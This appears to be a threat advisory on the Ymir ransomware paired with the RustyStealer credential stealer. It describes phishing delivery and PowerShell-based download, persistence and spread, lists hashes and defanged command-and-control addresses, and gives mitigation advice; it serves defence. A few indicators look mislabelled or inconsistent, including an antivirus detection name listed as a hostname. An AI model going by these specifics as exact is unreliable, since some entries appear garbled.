Ymir and RustyStealer Malware Duo Escalates Cyber Threat Landscape
Threat Group: Unidentified Threat Actor
Threat Type: Ransomware, Info-Stealer
Exploited Vulnerabilities: Common file encryption mechanisms, credential theft techniques
Malware Used: Ymir Ransomware, RustyStealer
Threat Score: High (8.2/10) — Due to its dual-impact functionality that combines data theft with ransomware encryption.
Last Threat Observation: November 10, 2024
Overview
A newly identified ransomware variant, dubbed Ymir, has emerged in the cyber landscape, working in tandem with RustyStealer malware to maximize damage and data exploitation. First observed in early November 2024, this pairing enables attackers to both lock down systems and exfiltrate sensitive data, posing severe risks to businesses, individuals, and public sector entities. Ymir’s encryption disrupts operations, while RustyStealer collects valuable credentials and system data, broadening the threat actor's potential for further exploitation.
Key Details
- Delivery Method: Primarily through phishing emails containing malicious links or attachments.
- Target: Organizations with sensitive data and networked environments.
- Functions:
- Data Encryption: Ymir encrypts critical files, making them inaccessible.
- Credential Theft: RustyStealer collects login credentials and system information.
- Network Propagation: Ymir spreads through networked systems.
- Persistence: Uses techniques to stay active on infected systems.
- PowerShell Exploitation: Employs PowerShell scripts for execution, evasion, and spread.
How It Infects the System
Ymir ransomware and RustyStealer often start with phishing emails designed to trick users into clicking on malicious links or opening infected attachments, such as Office documents or PDFs. Once the file is opened, it may automatically run a script or direct the user to download the malware, allowing both Ymir and RustyStealer to install on the system.
After gaining entry, these malware types exploit PowerShell, a Windows scripting tool, to execute commands, download additional malware, and move laterally across the network. PowerShell is powerful and easily hidden, which allows attackers to:
- Download and Execute Malware: PowerShell commands are used to download Ymir and RustyStealer from remote servers, making the infection "fileless" and harder to detect by antivirus tools.
- Evasion through Obfuscation: Attackers disguise PowerShell commands to bypass security tools, often encoding them in ways that make detection more challenging.
- Establish Persistence: PowerShell is used to set up scheduled tasks or registry entries, making sure the malware remains active even after a reboot.
- Spread within Networks: PowerShell’s remote capabilities allow Ymir to spread to other devices, amplifying the ransomware's impact across connected systems.
Attack Vectors
The Ymir and RustyStealer malware combination primarily infiltrates networks through phishing emails with malicious attachments or links. Upon activation, RustyStealer immediately begins gathering sensitive data, such as login credentials and system details. Once this data is extracted, Ymir ransomware initiates file encryption, rendering local data inaccessible. The dual malware setup allows attackers to leverage both immediate and long-term threats, from credential compromise to prolonged operational downtime.
Known Indicators of Compromise (IoCs)
MD5 File Hashes
12acbb05741a218a1c83eaa1cfc2401f
39df773139f505657d11749804953be5
5384d704fadf229d08eab696404cbba6
5ee1befc69d120976a60a97d3254e9eb
SHA1 File Hashes
3648359ebae8ce7cacae1e631103659f5a8c630e
8287d54c83db03b8adcdf1409f5d1c9abb1693ac
e6c4d3e360a705e272ae0b505e58e3d928fb1387
f954d1b1d13a5e4f62f108c9965707a2aa2a3c89
fe6de75d6042de714c28c0a3c0816b37e0fa4bb3
SHA256 File Hashes
51ffc0b7358b7611492ef458fdf9b97f121e49e70f86a6b53b93ed923b707a03
8287d54c83db03b8adcdf1409f5d1c9abb1693ac8d000b5ae75b3a296cb3061c
b087e1309f3eab6302d7503079af1ad6af06d70a932f7a6ae1421b942048e28a
cb88edd192d49db12f444f764c3bdc287703666167a4ca8d533d51f86ba428d8
IPv4 Addresses
5[.]255[.]117[.]134
74[.]50[.]84[.]181
85[.]239[.]61[.]60
94[.]158[.]244[.]69
URLs
http://5[.]255[.]117[.]134:80
http://74[.]50[.]84[.]181:443
http://94[.]158[.]244[.]69:443
Hostname
trojan[.]msil[.]dnoper[.]sb
Mitigation and Prevention
- User Awareness: Conduct phishing awareness training to reduce click-through rates on malicious links.
- Email Filtering: Implement email filtering tools to block emails with suspicious attachments and URLs.
- Antivirus Protection: Update antivirus solutions and endpoint protection systems to recognize and respond to Ymir and RustyStealer.
- Two-Factor Authentication (2FA): Enforce 2FA on all systems to mitigate credential theft.
- Monitor Logs: Regularly review network and endpoint logs to identify unusual access or data transfer activity.
- Regular Updates: Ensure that all systems, including antivirus definitions, are up to date to protect against known vulnerabilities and threat signatures.
Conclusion
The Ymir and RustyStealer malware combination represents a significant threat due to its dual capabilities of data encryption and credential theft. Organizations are advised to implement strong access controls, user awareness training, and to stay vigilant with log monitoring and regular updates. Early detection and robust email filtering are key to minimizing the risk of compromise.